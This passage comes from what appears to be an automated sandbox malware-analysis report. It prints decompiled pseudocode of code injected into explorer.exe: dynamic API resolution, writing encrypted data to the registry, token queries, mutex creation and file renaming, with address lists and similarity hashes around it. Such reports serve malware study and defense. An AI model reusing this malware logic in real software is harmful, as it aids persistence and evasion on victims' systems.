							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























        0x0008dfb6
        0x0008dfb8
        0x0008dfbb
        0x0008dfbe
        0x0008dfc4
        0x0008e021
        0x00000000
        0x0008e021
        0x0008dfc6
        0x0008dfd1
        0x0008dfd4
        0x0008dfd9
        0x0008dfde
        0x0008dfe1
        0x0008dfe3
        0x0008dfe6
        0x0008dfe9
        0x0008dfee
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0008dff0
        0x0008dff0
        0x0008e002
        0x0008e00f
        0x0008e013
        0x00000000
        0x00000000
        0x0008e015
        0x0008e018
        0x0008e019
        0x0008e01f
        0x00000000
        0x00000000
        0x00000000
        0x0008e01f
        0x0008e036
        0x0008e03b
        0x0008e03f
        0x00000000
        0x0008e04b
        0x0008e04b
        0x0008e04d
        0x0008e04d
        0x0008e053
        0x00000000
        0x00000000
        0x0008e059
        0x0008e05d
        0x0008e061
        0x00000000
        0x00000000
        0x00000000
        0x0008e061
        0x0008e067
        0x0008e06f
        0x0008e074
        0x0008e077
        0x0008e077
        0x0008e079
        0x0008e07d
        0x0008e085
        0x00000000
        0x00000000
        0x0008e089
        0x0008e091
        0x00000000
        0x00000000
        0x00000000
        0x0008e091

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
        • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
        • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
        • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00089B43, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 543 89b43-89b75 call 88604 546 89b7e-89b9e call 8b5f6 543->546 547 89b77-89b79 543->547 551 89ba0 546->551 552 89ba3-89bb8 call 895c7 546->552 548 89e1a-89e1e 547->548 551->552 555 89cee-89cfb 552->555 556 89bbe-89bd6 552->556 557 89d3c-89d4c call 89292 555->557 558 89cfd-89d1e 555->558 563 89ceb 556->563 564 89bdc-89bf8 556->564 567 89d4f-89d51 557->567 565 89d20-89d3a call 89292 558->565 566 89d54-89d74 call 885c2 RegOpenKeyExA 558->566 563->555 564->566 573 89bfe-89c18 call 89292 564->573 565->567 574 89dc8-89dcd 566->574 575 89d76-89d8b RegCreateKeyA 566->575 567->566 580 89d8d-89db2 call 8861a memset call 8861a 573->580 582 89c1e-89c36 573->582 577 89dcf 574->577 578 89dd5 574->578 579 89dba-89dbf 575->579 575->580 577->578 585 89dd8-89df4 call 8c379 578->585 583 89dc1 579->583 584 89dc3-89dc6 579->584 580->579 592 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 582->592 593 89cab-89cb0 582->593 583->584 584->585 599 89e0b-89e18 call 8861a 585->599 600 89df6-89e09 585->600 615 89c8b-89ca9 call 8861a * 2 592->615 616 89c7e-89c83 592->616 598 89cb6-89ce9 call 89292 call 8861a 593->598 598->566 599->548 600->599 600->600 615->598 616->615 618 89c85 616->618 618->615
        C-Code - Quality: 89%
        			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x133fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x133fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x133fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x133fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x133fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x133fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x133fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x133f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}



















































        0x00089b4c
        0x00089b4e
        0x00089b51
        0x00089b53
        0x00089b5b
        0x00089b5e
        0x00089b65
        0x00089b6d
        0x00089b6f
        0x00089b75
        0x00089b7e
        0x00089b86
        0x00089b8c
        0x00089b93
        0x00089b99
        0x00089b9b
        0x00089b9e
        0x00089ba0
        0x00089ba0
        0x00089ba0
        0x00089ba8
        0x00089bab
        0x00089bb0
        0x00089bb3
        0x00089bb6
        0x00089bb8
        0x00089cee
        0x00089cee
        0x00089cf4
        0x00089cfb
        0x00089d3c
        0x00089d40
        0x00089d41
        0x00089d47
        0x00089d4c
        0x00089d4f
        0x00089d4f
        0x00089d51
        0x00000000
        0x00089d51
        0x00089d00
        0x00089d0a
        0x00089d13
        0x00089d18
        0x00089d1b
        0x00089d1e
        0x00000000
        0x00000000
        0x00089d20
        0x00089d24
        0x00089d25
        0x00089d2a
        0x00089d2b
        0x00089d2e
        0x00089d32
        0x00089d37
        0x00000000
        0x00089bbe
        0x00089bbe
        0x00089bcb
        0x00089bd1
        0x00089bd4
        0x00089bd6
        0x00089ceb
        0x00000000
        0x00089ceb
        0x00089bdf
        0x00089be3
        0x00089beb
        0x00089bf2
        0x00089bf5
        0x00089bf8
        0x00089d54
        0x00089d57
        0x00089d6f
        0x00089d72
        0x00089d74
        0x00089dc8
        0x00089dcb
        0x00089dcd
        0x00089dcf
        0x00089dcf
        0x00089dd5
        0x00089dd8
        0x00089dd8
        0x00089ddd
        0x00089de4
        0x00089dea
        0x00089def
        0x00089df2
        0x00089df4
        0x00089e0b
        0x00089e11
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00089df6
        0x00089df6
        0x00089e02
        0x00089e06
        0x00089e07
        0x00089e07
        0x00000000
        0x00089df6
        0x00089d79
        0x00089d86
        0x00089d89
        0x00089d8b
        0x00089dba
        0x00089dbd
        0x00089dbf
        0x00089dc1
        0x00089dc1
        0x00089dc3
        0x00000000
        0x00089dc3
        0x00089d8d
        0x00089d96
        0x00089da2
        0x00089dad
        0x00000000
        0x00089db2
        0x00089bfe
        0x00089bff
        0x00089c02
        0x00089c07
        0x00089c0b
        0x00089c10
        0x00089c13
        0x00089c16
        0x00089c18
        0x00000000
        0x00000000
        0x00089c29
        0x00089c31
        0x00089c34
        0x00089c36
        0x00089cab
        0x00089cb3
        0x00089c38
        0x00089c3a
        0x00089c49
        0x00089c51
        0x00089c57
        0x00089c5a
        0x00089c62
        0x00089c65
        0x00089c6f
        0x00089c72
        0x00089c77
        0x00089c7a
        0x00089c7c
        0x00089c7e
        0x00089c81
        0x00089c83
        0x00089c85
        0x00089c85
        0x00089c83
        0x00089c91
        0x00089c9c
        0x00089ca1
        0x00089ca4
        0x00089ca4
        0x00089cc3
        0x00089cc8
        0x00089cce
        0x00089cd1
        0x00089cd3
        0x00089cd9
        0x00089ce2
        0x00000000
        0x00089ce8
        0x00089bb8
        0x00089b77
        0x00000000

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
        • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
        • Opcode Fuzzy Hash: 7a5bdae8416784e85c0cb2d11311cc110e919660312a92c4e400b32489df4c49
        • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A0AB, Relevance: 4.6, APIs: 3, Instructions: 146registryCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E0008D400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E00092301(_t107 + __edx,  &_v2832);
					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E00088604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000886E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000922D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E0008F490( &_v16, _t104);
						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
						E0008EB2E(_t106, _v20,  &_v328);
						_t73 = E00089B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000897A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E0008861A( &_v12, 0xffffffff);
						}
						E0008861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}



























        0x0008a0b8
        0x0008a0bd
        0x0008a0bf
        0x0008a0c2
        0x0008a231
        0x0008a231
        0x0008a231
        0x00000000
        0x0008a0d2
        0x0008a0d2
        0x0008a0d4
        0x00000000
        0x00000000
        0x0008a0da
        0x0008a0e3
        0x0008a0e6
        0x0008a0e7
        0x0008a0ef
        0x0008a0f2
        0x0008a0fd
        0x0008a10d
        0x0008a112
        0x0008a115
        0x0008a11e
        0x0008a126
        0x0008a12b
        0x0008a130
        0x0008a13d
        0x0008a13f
        0x0008a146
        0x0008a14b
        0x0008a14e
        0x0008a156
        0x0008a163
        0x0008a168
        0x0008a16e
        0x0008a177
        0x0008a17d
        0x0008a180
        0x0008a181
        0x0008a193
        0x0008a1a3
        0x0008a1af
        0x0008a1b4
        0x0008a1b7
        0x0008a1b9
        0x0008a1c3
        0x0008a1de
        0x0008a1e1
        0x0008a1e3
        0x0008a1fe
        0x0008a201
        0x0008a203
        0x0008a205
        0x0008a207
        0x0008a207
        0x0008a210
        0x0008a1e5
        0x0008a1e5
        0x0008a1e7
        0x0008a1e7
        0x0008a219
        0x0008a21f
        0x0008a226
        0x00000000
        0x0008a22d
        0x0008a134
        0x00000000
        0x0008a134

        APIs
          • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapOpen_ftol2_sse
        • String ID:
        • API String ID: 3756893521-0
        • Opcode ID: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
        • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
        • Opcode Fuzzy Hash: d54c1703fe1289286cc4c0b85853d477177f9829347cd8886942ae4bf892e17c
        • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










        0x0008b99b
        0x0008b99c
        0x0008b9a3
        0x0008b9ab
        0x0008b9af
        0x0008b9b8
        0x0008b9fe
        0x0008b9fe
        0x0008b9c5
        0x0008b9cd
        0x0008b9cf
        0x0008b9d5
        0x0008b9ee
        0x00000000
        0x0008b9f0
        0x0008b9f5
        0x00000000
        0x0008b9fb
        0x0008b9d7
        0x0008b9d7
        0x0008b9d7
        0x0008b9d7
        0x0008b9d5
        0x0008ba04

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
        • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
        • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
        • Opcode Fuzzy Hash: 76e1adf5722fb6614a2b176c5bbd778ca9856826630c0b21538b3f5b23351a75
        • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x133f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








        0x00085910
        0x00085915
        0x00085921
        0x0008592e
        0x00085932
        0x0008594a
        0x0008596a
        0x0008596b
        0x0008595a
        0x0008595a
        0x00085960
        0x00085960
        0x00085934
        0x00085934
        0x0008593a
        0x0008593a
        0x00085917
        0x00085917
        0x00085917
        0x00085973

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
        • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
        • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
        • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
        • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008A471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
						_t8 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






        0x0008a47d
        0x0008a485
        0x0008a489
        0x0008a4a0
        0x0008a4af
        0x0008a4b5
        0x0008a4b8
        0x0008a4b8
        0x00000000
        0x0008a4ba
        0x0008a48b
        0x00000000

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
        • GetLastError.KERNEL32 ref: 0008A48B
        • GetLastError.KERNEL32 ref: 0008A495
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ErrorLast$CreateMutex
        • String ID:
        • API String ID: 200418032-0
        • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
        • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
        • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
        • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00086DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
        Download Yara Rule
        C-Code - Quality: 91%
        			E00086DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0x9e778; // 0x133fc08
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E00089ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0x9e78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0x9e688; // 0xb0000
						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
						 *0x9e78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0x9e688; // 0xb0000
					_push(L"\\c");
					_t9 = E000892E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0x9e688; // 0xb0000
							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E0008B269(_t59) == 0) {
								_t32 = E0008F14F(_t59, 0x1388, _t74);
							}
							E0008A4DB(_t56);
							_t41 =  *0x9e684; // 0x133f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E0008980C( &_v544);
								_t43 =  *0x9e778; // 0x133fc08
								_t53 = 0x33;
								if(E00089ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E00081C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E0008B1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0x9e778; // 0x133fc08
									_t53 = 0x12;
									_t22 = E00089ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
										_push(E0008980C(0));
										E00089640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E0008861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























        0x00086da0
        0x00086da6
        0x00086dac
        0x00086db9
        0x00086dba
        0x00086dbb
        0x00086dc2
        0x00086dc8
        0x00086dcd
        0x00086dcf
        0x00086dd1
        0x00086ddd
        0x00086de2
        0x00086de2
        0x00086de7
        0x00086de9
        0x00086dea
        0x00086df4
        0x00086dfa
        0x00086dff
        0x00086e01
        0x00086e04
        0x00086e0a
        0x00086e10
        0x00086e10
        0x00086e26
        0x00086e2a
        0x00000000
        0x00000000
        0x00086e39
        0x00086e42
        0x00086e42
        0x00086e46
        0x00086e4b
        0x00086e52
        0x00086e57
        0x00086e5d
        0x00086e62
        0x00086e6a
        0x00086e72
        0x00086ec0
        0x00086ec7
        0x00086ec9
        0x00086ecd
        0x00000000
        0x00086ecd
        0x00086e74
        0x00086e74
        0x00086e7c
        0x00086e7d
        0x00086e82
        0x00086e84
        0x00086e96
        0x00086ea7
        0x00086eac
        0x00086eb5
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00086e84
        0x00086e72
        0x00000000
        0x00086e57
        0x00086ede
        0x00086ee4
        0x00086e0a
        0x00086eeb

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FileMove
        • String ID: %s.%u
        • API String ID: 3562171763-1288070821
